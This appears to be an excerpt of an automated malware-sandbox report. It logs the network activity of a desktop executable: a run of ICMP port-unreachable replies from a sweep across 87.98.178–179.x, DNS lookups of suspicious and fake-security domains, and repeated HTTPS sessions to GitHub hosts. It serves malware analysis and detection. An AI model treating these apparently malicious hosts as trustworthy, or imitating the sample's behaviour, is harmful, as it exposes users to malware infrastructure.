                                                                                                        Sep 29, 2022 14:45:24.045552969 CEST87.98.178.199192.168.2.4c9fa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.045702934 CEST87.98.178.195192.168.2.4c9f6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.045995951 CEST87.98.178.206192.168.2.4ca01(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.046040058 CEST87.98.178.207192.168.2.4ca02(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.046212912 CEST87.98.178.208192.168.2.4ca03(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.046506882 CEST87.98.178.213192.168.2.4ca01(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.046526909 CEST87.98.178.205192.168.2.4ca00(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.047456026 CEST87.98.178.214192.168.2.4ca09(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.048131943 CEST87.98.178.225192.168.2.4ca14(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.048161030 CEST87.98.178.212192.168.2.4ca00(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.048562050 CEST87.98.178.234192.168.2.4ca1d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.048751116 CEST87.98.178.236192.168.2.4ca1f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.049917936 CEST87.98.178.237192.168.2.4ca20(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.049940109 CEST87.98.178.246192.168.2.4ca29(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.049957991 CEST87.98.178.240192.168.2.4ca23(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.050093889 CEST87.98.178.249192.168.2.4ca2c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.050113916 CEST87.98.178.247192.168.2.4ca23(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.050801992 CEST87.98.178.251192.168.2.4ca24(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:24.051450968 CEST87.98.178.254192.168.2.4ca31(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.063958883 CEST87.98.179.3192.168.2.4ca36(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.070103884 CEST87.98.179.13192.168.2.4ca40(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.071578979 CEST87.98.179.0192.168.2.4ca33(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.072103977 CEST87.98.179.4192.168.2.4ca37(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.072470903 CEST87.98.179.5192.168.2.4ca38(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.072575092 CEST87.98.178.255192.168.2.4ca32(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.074052095 CEST87.98.179.8192.168.2.4ca3b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.077608109 CEST87.98.179.14192.168.2.4ca41(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.078002930 CEST87.98.179.24192.168.2.4ca4b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.078069925 CEST87.98.179.20192.168.2.4ca47(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.078315973 CEST87.98.179.31192.168.2.4ca52(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.078855991 CEST87.98.179.29192.168.2.4ca50(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.078952074 CEST87.98.179.37192.168.2.4ca58(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.079109907 CEST87.98.179.30192.168.2.4ca51(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.079423904 CEST87.98.179.34192.168.2.4ca55(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.081057072 CEST87.98.179.44192.168.2.4ca5f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.081083059 CEST87.98.179.82192.168.2.4ca7e(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.081301928 CEST87.98.179.45192.168.2.4ca60(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.081634045 CEST87.98.179.41192.168.2.4ca5c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.081656933 CEST87.98.179.56192.168.2.4ca6b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082000017 CEST87.98.179.70192.168.2.4ca79(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082024097 CEST87.98.179.53192.168.2.4ca68(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082041025 CEST87.98.179.58192.168.2.4ca66(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082206011 CEST87.98.179.66192.168.2.4ca75(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082226992 CEST87.98.179.60192.168.2.4ca68(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082410097 CEST87.98.179.78192.168.2.4ca81(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082432032 CEST87.98.179.69192.168.2.4ca78(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082727909 CEST87.98.179.51192.168.2.4ca66(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.082813978 CEST87.98.179.54192.168.2.4ca69(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.083050013 CEST87.98.179.76192.168.2.4ca7f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.083129883 CEST87.98.179.80192.168.2.4ca83(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.083199978 CEST87.98.179.50192.168.2.4ca65(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.083554029 CEST87.98.179.106192.168.2.4ca9d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.087610006 CEST87.98.179.153192.168.2.4cacc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.090497971 CEST87.98.179.93192.168.2.4ca90(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.090991974 CEST87.98.179.96192.168.2.4ca93(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091022968 CEST87.98.179.105192.168.2.4ca9c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091207981 CEST87.98.179.99192.168.2.4ca96(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091324091 CEST87.98.179.118192.168.2.4caa9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091362000 CEST87.98.179.123192.168.2.4caa7(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091435909 CEST87.98.179.125192.168.2.4cab0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091614962 CEST87.98.179.119192.168.2.4caaa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091639996 CEST87.98.179.109192.168.2.4ca99(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091844082 CEST87.98.179.112192.168.2.4caa3(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.091912985 CEST87.98.179.113192.168.2.4caa4(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.092125893 CEST87.98.179.107192.168.2.4ca9e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.092400074 CEST87.98.179.115192.168.2.4caa6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.092583895 CEST87.98.179.135192.168.2.4caba(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.092606068 CEST87.98.179.137192.168.2.4cabc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.093127966 CEST87.98.179.104192.168.2.4ca9b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.093480110 CEST87.98.179.136192.168.2.4cabb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.094271898 CEST87.98.179.142192.168.2.4cac1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.094974041 CEST87.98.179.149192.168.2.4cac8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.095549107 CEST87.98.179.159192.168.2.4cacb(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.095730066 CEST87.98.179.162192.168.2.4cad5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.096012115 CEST87.98.179.155192.168.2.4cac4(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.096507072 CEST87.98.179.166192.168.2.4cad9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.097330093 CEST87.98.179.160192.168.2.4cad3(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.097352028 CEST87.98.179.164192.168.2.4cad7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.098074913 CEST87.98.179.171192.168.2.4cade(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.098160982 CEST87.98.179.173192.168.2.4cae0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.099076033 CEST87.98.179.188192.168.2.4caef(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.099498987 CEST87.98.179.187192.168.2.4caee(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.100145102 CEST87.98.179.189192.168.2.4caf0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.101504087 CEST87.98.179.196192.168.2.4caf7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.101974010 CEST87.98.179.199192.168.2.4cafa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.103698015 CEST87.98.179.201192.168.2.4cafc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.104270935 CEST87.98.179.206192.168.2.4cb01(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.105463982 CEST87.98.179.210192.168.2.4cb05(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.105617046 CEST87.98.179.214192.168.2.4cb09(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.105640888 CEST87.98.179.213192.168.2.4cb08(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.105851889 CEST87.98.179.216192.168.2.4cb0b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.106007099 CEST87.98.179.222192.168.2.4cb11(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.106076956 CEST87.98.179.218192.168.2.4cb0d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.106378078 CEST87.98.179.223192.168.2.4cb12(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.106400013 CEST87.98.179.221192.168.2.4cb10(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.106863976 CEST87.98.179.220192.168.2.4cb0f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.107053041 CEST87.98.179.229192.168.2.4cb11(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.107979059 CEST87.98.179.232192.168.2.4cb1b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.108392000 CEST87.98.179.242192.168.2.4cb25(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.108617067 CEST87.98.179.230192.168.2.4cb19(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.108726025 CEST87.98.179.240192.168.2.4cb23(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.109065056 CEST87.98.179.246192.168.2.4cb29(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.109340906 CEST87.98.179.245192.168.2.4cb28(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:25.110204935 CEST87.98.179.251192.168.2.4cb2e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:26.136166096 CEST87.98.179.255192.168.2.4cb32(Port unreachable)Destination Unreachable
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Sep 29, 2022 14:44:59.642365932 CEST192.168.2.48.8.8.80x8f98Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:00.345206976 CEST192.168.2.48.8.8.80xde59Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:39.559165001 CEST192.168.2.48.8.8.80x64b9Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:41.002249002 CEST192.168.2.48.8.8.80x22d8Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:44.980917931 CEST192.168.2.48.8.8.80x507cStandard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:58.916284084 CEST192.168.2.48.8.8.80x1238Standard query (0)powertoolsforyou.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:59.113996029 CEST192.168.2.48.8.8.80x8845Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:59.236999035 CEST192.168.2.48.8.8.80xf6d6Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:36.940516949 CEST192.168.2.48.8.8.80x7322Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:37.088084936 CEST192.168.2.48.8.8.80x750fStandard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Sep 29, 2022 14:44:59.661982059 CEST8.8.8.8192.168.2.40x8f98No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:00.363078117 CEST8.8.8.8192.168.2.40xde59No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:00.363078117 CEST8.8.8.8192.168.2.40xde59No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:00.363078117 CEST8.8.8.8192.168.2.40xde59No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:00.363078117 CEST8.8.8.8192.168.2.40xde59No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:39.578609943 CEST8.8.8.8192.168.2.40x64b9No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:41.021670103 CEST8.8.8.8192.168.2.40x22d8No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:45.002080917 CEST8.8.8.8192.168.2.40x507cNo error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:59.107394934 CEST8.8.8.8192.168.2.40x1238No error (0)powertoolsforyou.com38.238.72.106A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:59.131458044 CEST8.8.8.8192.168.2.40x8845No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:45:59.256238937 CEST8.8.8.8192.168.2.40xf6d6No error (0)google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:36.959197044 CEST8.8.8.8192.168.2.40x7322No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:36.959197044 CEST8.8.8.8192.168.2.40x7322No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:36.959197044 CEST8.8.8.8192.168.2.40x7322No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:36.959197044 CEST8.8.8.8192.168.2.40x7322No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:37.109461069 CEST8.8.8.8192.168.2.40x750fNo error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:46.194776058 CEST8.8.8.8192.168.2.40x9c08Name error (3)www5.internet-security-guard.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:46.196552038 CEST8.8.8.8192.168.2.40x9ae4Name error (3)secure1.safe-scanerwas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:46.310127020 CEST8.8.8.8192.168.2.40x717dName error (3)secure2.simplenetworkzqi.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:46.334012032 CEST8.8.8.8192.168.2.40xa104Name error (3)secure1.safe-scanerwas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:57.918495893 CEST8.8.8.8192.168.2.40x938fName error (3)searchaccount.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:58.491111994 CEST8.8.8.8192.168.2.40xdd51Name error (3)ashamedice.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Sep 29, 2022 14:46:58.618309975 CEST8.8.8.8192.168.2.40xbcName error (3)searchaccount.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                        • github.com
                                                                                                        • raw.githubusercontent.com
                                                                                                        • google.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.449707140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.449708185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.449718140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.449719185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.449720140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.449721185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.449736140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.449737185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.449739140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.449740185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.449741140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.449742185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.449709140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.449743140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.449744185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.449756140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.449757185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.449758140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.449759185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.449768140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.449769185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.449770140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.449771185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.449710185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.449773140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.449774185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.449777140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.449778185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.449780140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.449781185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.449782140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.449783185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.449788140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.449789185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.449711140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.449791140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.449792185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.449793140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.449796140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.449798140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.449800140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.449802140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.449804140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.449807140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.449809140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.449712185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.449811140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.449813140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.449822140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.449825140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.449827140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
